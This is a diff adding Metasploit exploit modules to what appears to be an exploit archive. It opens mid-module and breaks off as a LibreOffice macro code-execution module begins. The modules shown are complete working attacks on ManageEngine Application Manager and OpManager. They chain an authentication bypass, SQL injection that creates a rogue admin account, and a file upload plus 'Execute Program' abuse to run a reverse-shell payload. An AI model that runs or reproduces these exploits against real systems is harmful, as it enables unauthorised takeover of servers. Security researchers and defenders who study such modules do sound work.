+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(host, port, cookie, platform, @dir)
+  end
+
+  def file_up(host, port, cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'rhost'   => host,
+      'rport'   => port,
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(host, port, cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(host, port, cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(host, port, cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(host, port, cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    # For this part the build control will be placed.
+    # For now, AppManager plugin control is sufficient.
+    if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
+      return Exploit::CheckCode::Vulnerable
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    
+    appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+    am_host = appm_adr.split('://')[1].split(':')[0]
+    am_port = appm_adr.split('://')[1].split(':')[1]
+
+
+    if res && res.code == 200 && res.body.include?('.loginForm')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'cookie'  => @cookie,
+        'uri'     =>  '/Logout.do?showPreLogin=true',
+      )
+
+      appm_cookie = 'JSESSIONID_APM_' << res.headers['set-cookie'].split('JSESSIONID_APM_')[1].split('; ')[0]
+    else
+      print_error("APM Plugin does not working!")
+    end
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'j_security_check'),
+      'vars_post' => {
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD']
+      }
+    )
+
+    if res && res.code == 302
+      print_good("Successful login OPM with user : #{datastore['USERNAME']}")
+      @cookie = res.get_cookies
+      saltcookie = res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
+
+      res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, ';jsessionid=' + saltcookie),
+        'cookie'  => @cookie,
+      )
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'index.jsp'),
+        'cookie'  => @cookie,
+      )
+      cookie = @cookie + " " + res.get_cookies
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
+        'cookie'  => cookie
+      )
+
+      @cookie = cookie + " " + res.get_cookies 
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'j_username' => datastore['USERNAME'],
+          'j_password' => datastore['USERNAME'] + "@opm",
+          'submit' => 'Login'
+        }
+      )
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, '/MyPage.do?method=viewDashBoard&plugin_view=true&PRINTER_FRIENDLY=true&opm_user=' + datastore['USERNAME']),
+        'cookie'   => @cookie
+      )
+      
+      @cookies = @cookie + " " + res.get_cookies
+      send_sqli(am_host, am_port, @cookies, @cookie)
+
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+
+  def send_sqli(host, port, cookies, cookie)
+
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'rhost'   => host,
+        'rport'   => port,
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd,
+          'submit' => 'Login'
+        }
+      )
+
+      if res && res.code == 302 && res.body.include?('Redirecting to')
+        print_good("Privilege Escalation was successfully performed.")
+        print_good("New APM admin username = " + @uname)
+        print_good("New APM admin password = " + @pwd)
+        res = send_request_cgi(
+          'rhost'   => host,
+          'rport'   => port,
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        check_platform(host, port, @cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end
+    else
+      fail_with(Failure::NotVulnerable, 'Something went wrong!')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47228.rb b/exploits/multiple/remote/47228.rb
new file mode 100755
index 000000000..f97d6c1ef
--- /dev/null
+++ b/exploits/multiple/remote/47228.rb
@@ -0,0 +1,335 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine Application Manager v14.2 - Privilege Escalation / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the ME Application Manager v14.2 and prior versions.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
+        Therefore low authority user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-APM-v14-Privilege-Escalation-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 9090,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username']),
+        OptString.new('PASSWORD',  [true, 'OpManager Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(cookie)
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(cookie, platform, @dir)
+  end
+
+  def file_up(cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'index.do'),
+    )
+    # For this part the build control will be placed.
+    if res && res.code == 200 && res.body.include?('Build No:142')
+      return Exploit::CheckCode::Vulnerable
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => datastore['USERNAME'],
+          'j_password' => datastore['PASSWORD'],
+          'submit' => 'Login'
+        }
+      )
+
+      if res && res.code == 303
+        res = send_request_cgi(
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        send_sqli(@cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end     
+
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! User information is incorrect.')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+
+  def send_sqli(cookies)
+
+    @uname = Rex::Text.rand_text_alpha_lower(6)
+    uid = rand_text_numeric(3)
+    apk = rand_text_numeric(6) 
+    @pwd = rand_text_alphanumeric(8+rand(9))
+    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)"
+    pg_user ="" 
+    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+    ms_user =""
+    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + pg_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, '/jsp/NewThresholdConfiguration.jsp?resourceid=' + ms_user + '&attributeIDs=17,18&attributeToSelect=18'),
+      'cookie'   => cookies
+    )
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    if res && res.code == 200 && res.body.include?('.loginDiv')
+      @cookie = res.get_cookies
+
+      res = send_request_cgi(
+        'method'  => 'POST',
+        'cookie'   => @cookie,
+        'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+        'vars_post' => {
+          'clienttype' => 'html',
+          'j_username' => @uname,
+          'j_password' => @pwd,
+          'submit' => 'Login'
+        }
+      )
+      print @uname + "//" + @pwd
+      puts res.body
+      if res && res.code == 303
+        print_good("Privilege Escalation was successfully performed.")
+        print_good("New APM admin username = " + @uname)
+        print_good("New APM admin password = " + @pwd)
+        res = send_request_cgi(
+          'cookie'  => @cookie,
+          'method'  => 'GET',
+          'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+        )
+
+        @cookie = res.get_cookies
+        check_platform(@cookie)
+      else
+        fail_with(Failure::NotVulnerable, 'Failed to perform privilege escalation!')
+      end
+    else
+      fail_with(Failure::NotVulnerable, 'Something went wrong!')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47229.rb b/exploits/multiple/remote/47229.rb
new file mode 100755
index 000000000..60434ccf8
--- /dev/null
+++ b/exploits/multiple/remote/47229.rb
@@ -0,0 +1,292 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine OpManager v12.4x - Unauthenticated Remote Command Execution",
+      'Description'    => %q(
+        This module bypasses the user password requirement in the OpManager v12.4.034 and prior versions.
+        It performs authentication bypass and executes commands on the server.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Unauthenticated-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 8060,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username', 'admin']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(host, port, cookie)
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(host, port, cookie, platform, @dir)
+  end
+
+  def file_up(host, port, cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'rhost'   => host,
+      'rport'   => port,
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(host, port, cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(host, port, cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
+        'displayname' => @display,
+        'serversite' => 'local',
+        'choosehost' => -2,
+        'abortafter' => 5,
+        'command' => fname,
+        'execProgExecDir' => dir,
+        'cancel' => 'false'
+      }
+    )
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
+      print_status("Transactions completed. Attempting to get a session...")
+      exec(host, port, cookie, actionid)
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+  end
+
+  def exec(host, port, cookie, action)
+    send_request_cgi(
+      'method'  => 'GET',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'method' => 'testAction',
+        'actionID' => action,
+        'haid' => 'null'
+      }
+    )
+  end
+ 
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+ 
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+ 
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end 
+
+  def check
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+
+    if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
+      appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+      am_host = appm_adr.split('://')[1].split(':')[0]
+      am_port = appm_adr.split('://')[1].split(':')[1]
+
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+      )
+      # Password check vulnerability in Java Script :/
+      if res.body.include?('j_password.value=username')
+        return Exploit::CheckCode::Vulnerable
+      else 
+        return Exploit::CheckCode::Safe
+      end
+    else 
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def app_login
+
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
+    )
+    
+    appm_adr = res.body.split('<iframe src="')[1].split('/Logout.do?showPreLogin=false')[0]
+    am_host = appm_adr.split('://')[1].split(':')[0]
+    am_port = appm_adr.split('://')[1].split(':')[1]
+
+    res = send_request_cgi(
+      'rhost'   => am_host,
+      'rport'   => am_port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+    )
+
+    @cookie = res.get_cookies
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => am_host,
+      'rport'   => am_port,
+      'cookie'   => @cookie,
+      'uri'     =>  normalize_uri(target_uri.path, '/j_security_check'),
+      'vars_post' => {
+        'clienttype' => 'html',
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['USERNAME'] + "@opm",
+        'submit' => 'Login'
+      }
+    )
+
+    if res && res.code == 302 or 303
+      print_good("Authentication bypass was successfully performed.")
+      res = send_request_cgi(
+        'rhost'   => am_host,
+        'rport'   => am_port,
+        'cookie'  => @cookie,
+        'method'  => 'GET',
+        'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
+      )
+
+      @cookie = res.get_cookies
+      check_platform(am_host, am_port, @cookie)
+    else
+      fail_with(Failure::NotVulnerable, 'Failed to perform authentication bypass! Try with another username...')
+    end
+  end
+
+  def exploit
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    app_login
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/47298.rb b/exploits/multiple/remote/47298.rb
new file mode 100755
index 000000000..9c6a86dff
--- /dev/null
+++ b/exploits/multiple/remote/47298.rb
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'LibreOffice Macro Python Code Execution',
+      'Description'     => %q{
+        LibreOffice comes bundled with sample macros written in Python and
+        allows the ability to bind program events to them.
+
+        LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
+
+        This module generates an ODT file with a dom loaded event that,
+        when triggered, will execute arbitrary python code and the metasploit payload.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Nils Emmerich',    # Vulnerability discovery and PoC
+          'Shelby Pace',      # Base module author (CVE-2018-16858), module reviewer and platform-independent code
+          'LoadLow',          # This msf module
+          'Gabriel Masei'     # Global events vuln. disclosure
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2019-9851' ],
